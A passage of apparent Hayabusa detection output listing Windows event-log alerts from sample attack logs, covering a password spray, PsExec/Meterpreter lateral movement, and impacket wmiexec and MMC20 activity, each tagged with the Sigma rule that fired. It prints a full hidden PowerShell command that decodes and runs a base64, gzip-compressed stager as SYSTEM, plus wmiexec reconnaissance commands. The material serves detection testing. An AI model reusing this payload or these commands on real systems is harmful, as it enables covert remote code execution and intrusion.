Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:edygert/jlake/drook/mdouglas/cspizor/cragoso/baker/ssims/jorchilles/bking/smisenar/dmashburn/bgreenwood/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target 
Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 
-2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Dia
gnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 
05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:26:54.152 +09:00,IEWIN7,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx -2019-05-01 05:32:51.168 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,informational,Process Creation,Command: 
cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Whoami 
Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\mmc.exe -Embedding : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,MMC20 Lateral Movement,,rules/sigma/process_creation/win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx -2019-05-01 05:35:12.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> 